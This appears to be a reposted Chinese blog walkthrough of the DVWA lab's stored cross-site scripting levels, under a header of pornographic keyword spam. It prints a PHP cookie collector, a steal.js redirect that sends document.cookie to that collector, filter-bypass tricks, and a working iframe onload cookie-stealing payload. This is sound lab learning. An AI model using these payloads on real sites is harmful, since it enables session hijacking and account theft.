日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

【DVWA(五)】XXS存储型跨站攻击

發(fā)布時(shí)間:2024/4/17 编程问答 45 豆豆
生活随笔 收集整理的這篇文章主要介紹了 【DVWA(五)】XXS存储型跨站攻击 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

XSS存儲(chǔ)型跨站攻擊(Stored Cross Site Scripting)

前言:

相較于XSS反射型跨站攻擊,存儲(chǔ)型具有更嚴(yán)重的危害,如果在竊取信息的同時(shí)對(duì)網(wǎng)頁沒有任何變化,那受害者將很難發(fā)現(xiàn)。

如果我有寫的不太明白的地方,可以先看看之前XSS反射型跨站攻擊的隨筆


low:

1.觀察:

測試輸入模式,有兩個(gè)輸入框,經(jīng)測試,都有輸入限制,這個(gè)限制用網(wǎng)頁查看器很容易解決,我給改成了1000,其實(shí)不改也可以,就是在message里輸入payload也可以的;

2.輸入:

alert測試

<script>alert("test")</script>

3.刷新:

此時(shí)已經(jīng)將有攻擊的腳本數(shù)據(jù)傳到數(shù)據(jù)庫了,刷新之后就會(huì)彈出alert,觸發(fā)xss!
這就是存儲(chǔ)型XSS攻擊的厲害之處了,只要任何人訪問此網(wǎng)址,都會(huì)觸發(fā),因此比反射型更加嚴(yán)重!
現(xiàn)在clear掉數(shù)據(jù)庫信息,開始正式進(jìn)行攻擊。

4.php代碼:

在www里新建php文件,用于偷取cookie:

<?php$cookie=$_GET['cookie']; file_put_contents('get_low_dvwa_cookie.txt',$cookie);?>

5.構(gòu)造JS代碼:

這次采取與反射型不同的方式,不在輸入框里直接輸入js代碼段,而是在www下寫腳本文件,然后利用標(biāo)簽加載網(wǎng)址對(duì)應(yīng)的js代碼
新建JS文件steal.js:

document.location='http://127.0.0.1/get_low_dvwa_cookie.php?cookie='+document.cookie

6.XSS攻擊加載JS代碼:

構(gòu)造payload:

name:<script src="http://127.0.0.1/steal.js"></script>

message:steal

提交之后可以看見,界面跳轉(zhuǎn)了,說明攻擊成功

7.隱蔽:

現(xiàn)在攻擊成功,但是跳轉(zhuǎn)界面容易讓用戶懷疑,所以進(jìn)一步調(diào)整,盡量隱蔽,能夠不引起直觀變化的情況下進(jìn)行攻擊獲取cookie。
利用ajax,在不刷新的情況下偷取cookie!挖坑XD


medium:

用大小寫組合,繞過對(duì)于<script>的處理:

<SCRIPT> <scr<script>ipt>

接下來和low一樣了。其實(shí)這里跟反射型的XSS大同小異。


high:

1.用alert嘗試

不行

2.用大小寫組合嘗試

不行

3.換標(biāo)簽

用?<iframe onload=alert("test")>?測試,可行!

4.構(gòu)造payload:

name:<iframe οnlοad=document.location='http://127.0.0.1/get_low_dvwa_cookie.php?cookie='+document.cookie>

message:steal

成功!


impossible:

暫時(shí)依舊無解


后記

因?yàn)槭谴鎯?chǔ)型,所以測試的時(shí)候會(huì)出現(xiàn),一直跳轉(zhuǎn)的情況,所以在后臺(tái)把記錄刪掉就好了。

然后是合天網(wǎng)安相關(guān)部分的兩個(gè)思考:

1)反射型跨站和存儲(chǔ)型跨站的區(qū)別和利用方法的不同?

反射型是偏向?qū)崟r(shí)的,點(diǎn)對(duì)點(diǎn)的最有效,把鏈接發(fā)送給某個(gè)人,這樣最好了;然后存儲(chǔ)型是大范圍撒網(wǎng),一旦形成了攻擊,存進(jìn)了數(shù)據(jù)庫,就有大把的數(shù)據(jù)了!

2)如何結(jié)合CSRF漏洞攻擊?

暫時(shí)還沒搞這部分,留坑

轉(zhuǎn)載于:https://www.cnblogs.com/wayne-tao/p/11079859.html

總結(jié)

以上是生活随笔為你收集整理的【DVWA(五)】XXS存储型跨站攻击的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。